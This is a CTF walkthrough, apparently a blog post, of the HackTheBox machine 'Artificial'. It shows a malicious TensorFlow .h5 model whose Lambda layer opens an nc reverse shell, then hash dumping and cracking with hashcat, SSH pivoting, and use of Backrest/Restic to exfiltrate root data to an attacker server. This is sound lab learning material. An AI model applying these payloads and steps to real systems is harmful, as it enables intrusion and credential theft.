In this article I’ll show you a walkthrough of my solution to the HTB machine Artificial.
Artificial is rated Medium on HackTheBox and runs a modern Linux environment with a web application that exposes TensorFlow functionality. The box heavily focuses on interpreting and exploiting machine learning related components on the web layer, then shifts into credential cracking, SSH movement, and finally privilege escalation through misconfigured backup tools.
Target IP: 10.10.11.74
Operating System: Linux
Difficulty: Easy
Attack Surface:
These components define the core exploitation path. The next step is to dive deeper with enumeration to locate the initial foothold.
I started with a quick service and version scan against the target.
nmap -sV -sC -Pn 10.10.11.74Nmap returned a very small attack surface:
Press enter or click to view image in full size
Only SSH and a single web service were exposed, which immediately suggests the entry point is going to be through the web layer rather than brute forcing SSH. The site title, Artificial, already hints at some kind of AI or ML related functionality behind the scenes.
To clean up the workflow, I added the hostname to my hosts file:
sudo sh -c 'echo "10.10.11.74 artificial.htb" >> /etc/hosts'With the host mapped, I browsed to the site.
Press enter or click to view image in full size
The landing page introduces Artificial, a platform for uploading and running AI models. No login creds are provided, so I created a new account. The app does not enforce email verification, so anything works.
Press enter or click to view image in full size
Once inside, I landed on /dashboard. This is where the real functionality lives. The page advertises model management and exposes two interesting links:
requirements.txtDockerfileBoth files are downloadable directly from the application. Opening them confirms something important: the backend is loading TensorFlow CPU 2.13.1 inside Python 3.8.
TensorFlow model loading is known for executing arbitrary Python code if Lambda layers are allowed and not sanitized. The presence of a model upload form that accepts .h5 files is a clear indicator that this is the entry point.
At this point the attack path is straightforward:
build a malicious TensorFlow model, upload it, wait for the backend to load it, and get code execution.
Since the application processes user supplied .h5 models, the safest way to craft a compatible payload is to mirror the target environment. The Dockerfile provided by the site made that trivial.
I dropped their Dockerfile and requirements into a working directory and built the environment they expect:
sudo docker build -t artificial-exploit .Inside this container, I created a minimal Keras model with a Lambda layer that executes a reverse shell when loaded.
exploit.py:
import tensorflow as tfdef exploit(x):
import os
os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <MY-IP> 4444 >/tmp/f")
return xmodel = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")
With a listener running:
nc -nlvp 4444I uploaded the model from the dashboard and triggered it by selecting View Predictions. As expected, TensorFlow executed the Lambda layer on the server, which handed me a shell immediately.
The reverse shell dropped me in the context of the application user. I started with a quick look around the web directory.
ls -laOne directory stood out immediately: instance. Flask applications commonly stash their SQLite databases there, and inside I found exactly what I expected:
instance/
instance/users.dbA SQLite file in a Flask project almost always means user authentication data. I confirmed the file type:
file instance/users.dbSQLite 3.x. Perfect.
Join Medium for free to get updates from this writer.
I opened the database:
sqlite3 instance/users.dbOnce inside, I checked the tables:
.tablesTwo tables were present: user and model. The user table was the obvious target. I inspected its structure:
PRAGMA table_info(user);The schema contained the expected fields: id, username, email, and password (hashed). I dumped everything:
SELECT * FROM user;With that, I had all users and their password hashes.
Press enter or click to view image in full size
I copied the hashes into a file on my attacker machine:
echo "
*****
" > hash.txtThen ran Hashcat:
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --forceAnd revealed the cracked results:
hashcat -m 0 hash.txt --showTwo real credentials dropped out:
gael : *****
robert : *****These were likely system users.
With credentials in hand, I tried SSH directly:
ssh [email protected]Gael’s login succeeded. Robert’s account existed but did not have a valid shell. I confirmed available system shells:
getent passwd | awk -F: '$7 ~ /sh$/ {print $1 ":" $7}'Valid shells:
root:/bin/bash
gael:/bin/bash
app:/bin/bashNo SSH restrictions were in place:
grep -i AllowUsers /etc/ssh/sshd_configFrom here, I gathered local context:
id
sudo -l
ss -tulnp | grep LISTEN
ls -la /var/backupsFindings:
/var/backups/backrest_backup.tar.gz.That backup was the next obvious target.
I pulled the backup to my machine:
scp [email protected]:/var/backups/backrest_backup.tar.gz .It came down as a plain tar archive, not gzip. I renamed and extracted it:
mv backrest_backup.tar.gz backrest_backup.tar
tar -xvf backrest_backup.tarThe extraction revealed the following structure:
backrest/
backrest/restic
backrest/oplog.sqlite-wal
backrest/oplog.sqlite-shm
backrest/.config/
backrest/.config/backrest/
backrest/.configxbackrest/config.json
backrest/oplog.sqlite.lock
backrest/backrest
backrest/tasklogs/
backrest/tasklogs/logs.sqlite-shm
backrest/tasklogs/.inprogress/
backrest/tasklogs/logs.sqlite-wal
backrest/tasklogs/logs.sqlite
backrest/oplog.sqlite
backrest/jwt-secret
backrest/processlogs/
backrest/processlogs/backrest.log
backrest/install.shThe extracted structure revealed Backrest and Restic artifacts, along with multiple SQLite databases, logs, and configs. One file stood out:
backrest/.config/backrest/config.jsonInside was a base64 encoded bcrypt password. I decoded it:
cat backrest/.config/backrest/config.json \
| grep password \
| awk -F\" '{print $4}' \
| base64 -d > bcrypt.hashThen cracked it:
hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt --forceThis password belonged to the administrator account for the service running internally on port 9898.
I forwarded the local service through SSH:
ssh -L 9898:127.0.0.1:9898 [email protected]Navigating to:
http://localhost:9898I logged in with:
Username: backrest_root
Password: This gave me full access to Backrest’s management interface.
Backrest wraps Restic, and Restic happens to be listed on GTFOBins for privilege escalation when executed through sudo. The restore and backup operations can be pointed at an attacker controlled Restic server to retrieve root level data.
I started a Restic server on my machine:
rest-server --path /tmp/restic-data --listen :12345 --no-authThen, through the Backrest panel, I added a new repository pointing to my listener and issued commands to back up the root filesystem.
Once the operation completed, I listed the snapshots:
restic -r /tmp/restic-data/<repo-name> snapshotsThen restored them:
restic -r /tmp/restic-data/<repo-name> restore <snapshot-id> --target ./restoreInside the restored tree:
cat restore/root/root.txtThat revealed the final root flag.
Artificial shows how a single insecure machine learning feature can compromise an entire system. By uploading a malicious TensorFlow .h5 model, I gained remote code execution through unsafe Lambda deserialization. From there, I dumped and cracked user hashes from the exposed SQLite database and moved laterally into a real SSH account.
Further enumeration uncovered a Backrest backup archive containing credentials for an internal admin interface. After cracking the bcrypt password and port forwarding the service, I gained full control of Backrest and abused its Restic integration to exfiltrate and restore root level data. This provided access to the root flag.
The machine demonstrates the risks of unvalidated ML model loading, weak secrets management, and misconfigured backup systems.